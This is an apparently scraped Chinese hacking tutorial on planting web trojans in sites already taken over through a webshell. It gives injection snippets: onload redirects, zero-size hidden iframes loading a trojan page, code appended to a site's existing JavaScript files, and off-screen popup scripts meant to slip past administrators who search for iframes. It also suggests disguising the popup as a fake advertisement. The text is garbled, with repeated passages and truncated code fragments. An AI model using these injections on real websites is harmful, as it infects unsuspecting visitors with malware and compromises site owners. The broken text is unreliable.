网页挂马
网页挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面!再加代码使得木马在打开网页是运行!
网页挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面!再加代码使得木马在打开网页是运行!
几种挂马的方式,给大家总结出来,希望能有所帮助。在入侵了一个站拿到了webshell的时候,最常见的挂站代码如下 :
(一)启动时加载一个网页:
CODE:<body onload="window.location='网页木马地址';"></body>
(二)加入一个隐藏框架:
CODE:
<html>
<iframe src="[url]http://192.168.1.3/inc/joke.htm[/url]" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>[url]http://192.168.1.3/inc/joke.htm[/url]。而
(一)启动时加载一个网页:
CODE:<body onload="window.location='网页木马地址';"></body>
(二)加入一个隐藏框架:
CODE:
<html>
<iframe src="[url]http://192.168.1.3/inc/joke.htm[/url]" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>[url]http://192.168.1.3/inc/joke.htm[/url]。而
_blank>[url]http://192.168.1.3/inc/joke.htm[/url]也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就
是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。
(三)图片木马:
CODE:<html>
<body>
<iframe src="网页木马地址" width=0 height=0></iframe>
<img src="图片地址"></img>
</html>
(四)邮箱网页木马:
这段代码加到页面最后面:
CODE:</html><iframe src="网页木马地址" name="zhu" width ="0" height="0" frameborder="0"></html>
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了
(五)JS方式
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下
(三)图片木马:
CODE:<html>
<body>
<iframe src="网页木马地址" width=0 height=0></iframe>
<img src="图片地址"></img>
</html>
(四)邮箱网页木马:
这段代码加到页面最后面:
CODE:</html><iframe src="网页木马地址" name="zhu" width ="0" height="0" frameborder="0"></html>
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了
(五)JS方式
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下
代码(最好在原来的代码上,回车一行加上代码)
CODE:document.write('<IFRAME marginWidth=0 marginHeight=0 src="[url]http:///ma.htm[/url]" frameBorder=0 width=0
CODE:document.write('<IFRAME marginWidth=0 marginHeight=0 src="[url]http:///ma.htm[/url]" frameBorder=0 width=0
scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
以上代码中的[url]http:///ma.htm[/url],换成你自己的网页木马的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
(六)script
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
CODE:<script>
file://window.showModelessDialog("javascript:window.open('[url]http:///index.htm
以上代码中的[url]http:///ma.htm[/url],换成你自己的网页木马的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
(六)script
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
CODE:<script>
file://window.showModelessDialog("javascript:window.open('[url]http:///index.htm
[/url]','k','top=3000,left=3000,width=0,height=0');
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
或者
CODE:<SCRIPT language=javascript>
window.open
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
或者
CODE:<SCRIPT language=javascript>
window.open
t=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不
是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显
示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在
这里就不一一列举了,flash木马也很厉害的哦。
(七):
代码加进包含文件<!--#include file="conn.asp"-->
代码加进包含文件<!--#include file="conn.asp"-->
